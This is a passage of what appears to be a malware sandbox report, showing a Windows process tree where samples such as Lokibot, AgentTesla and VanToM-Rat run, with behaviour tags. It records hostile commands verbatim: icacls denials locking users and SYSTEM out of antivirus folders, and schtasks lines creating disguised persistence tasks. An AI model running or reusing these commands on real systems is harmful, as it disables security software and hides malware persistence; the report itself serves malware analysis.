C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)4⤵PID:5768
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)4⤵PID:400
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)4⤵PID:3440
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:2596 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)4⤵PID:4720
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:5948 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4596
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)4⤵PID:4980
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:4804 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)4⤵PID:5152
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1828
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵PID:704
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4484
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)4⤵PID:5872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3656
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵PID:5236
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:1604 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)4⤵PID:704
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5304
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)4⤵PID:6004
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)4⤵PID:1196
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)4⤵PID:2536
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)4⤵PID:704
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5676
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:2568 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3240
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)4⤵PID:1196
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5772
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)4⤵PID:5948
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4760
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵PID:5860
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)4⤵PID:4472
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵PID:5156
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)4⤵PID:2728
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5976
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5940
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 14⤵
- Scheduled Task/Job: Scheduled Task
PID:5808
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1364 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3728
-
-
-
-
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5944 -
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5212
-
-
-
C:\Users\Admin\Downloads\Apex.exe"C:\Users\Admin\Downloads\Apex.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5876
-
-
C:\Users\Admin\Downloads\AgentTesla.exe"C:\Users\Admin\Downloads\AgentTesla.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5948
-
-
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\is-51H9M.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-51H9M.tmp\butterflyondesktop.tmp" /SL5="$10003C,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4320 -
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html5⤵PID:5344
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html6⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5248 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x274,0x7ffb6712f208,0x7ffb6712f214,0x7ffb6712f2207⤵PID:2820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1976,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=2288 /prefetch:37⤵PID:1184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2016,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=2028 /prefetch:27⤵PID:4984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2384,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=2504 /prefetch:87⤵PID:2956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3524,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:17⤵PID:4476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3536,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:17⤵PID:5192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4240,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:17⤵PID:6072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4304,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:27⤵PID:3308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3668,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=3736 /prefetch:87⤵PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5128,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:87⤵PID:1456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4040,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=5300 /prefetch:87⤵PID:6468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4244,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=5144 /prefetch:87⤵PID:6476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5920,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:87⤵PID:6848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5920,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:87⤵PID:6912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6048,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6068 /prefetch:17⤵PID:6988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6280,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6300 /prefetch:87⤵PID:6164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6288,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:87⤵PID:6260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6036 /prefetch:87⤵PID:6348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6724,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6300 /prefetch:87⤵PID:6648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6544,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6788 /prefetch:87⤵PID:6748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6892,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6904 /prefetch:87⤵PID:6752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7052,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6896 /prefetch:87⤵PID:7068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6216,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6332 /prefetch:87⤵PID:6256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4412,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6024 /prefetch:87⤵PID:6276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6016,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6012 /prefetch:87⤵PID:4036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4548,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6596 /prefetch:87⤵PID:7008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5460,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=5248 /prefetch:87⤵PID:6004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5844,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=6396 /prefetch:87⤵PID:6052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6732,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:87⤵PID:7100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6504,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=5816 /prefetch:87⤵PID:6724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5500,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=5496 /prefetch:87⤵PID:6784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5632,i,319464734641094222,8977043844838079804,262144 --variations-seed-version --mojo-platform-channel-handle=5184 /prefetch:87⤵PID:6852
-
-
-
-
-
-
C:\Users\Admin\Downloads\Amus.exe"C:\Users\Admin\Downloads\Amus.exe"3⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5560
-
-
C:\Users\Admin\Downloads\Happy99.exe"C:\Users\Admin\Downloads\Happy99.exe"3⤵
- Drops file in System32 directory
PID:3556
-
-
C:\Users\Admin\Downloads\Gruel.a.exe"C:\Users\Admin\Downloads\Gruel.a.exe"3⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:6180
-
-
C:\Users\Admin\Downloads\Gruel.a.exe"C:\Users\Admin\Downloads\Gruel.a.exe" C:\Users\Admin\Downloads\Duksten.exe3⤵
- Modifies registry class
PID:2124
-
-
-
C:\Users\Admin\Downloads\VanToM-Rat(1).bat"C:\Users\Admin\Downloads\VanToM-Rat(1).bat"1⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
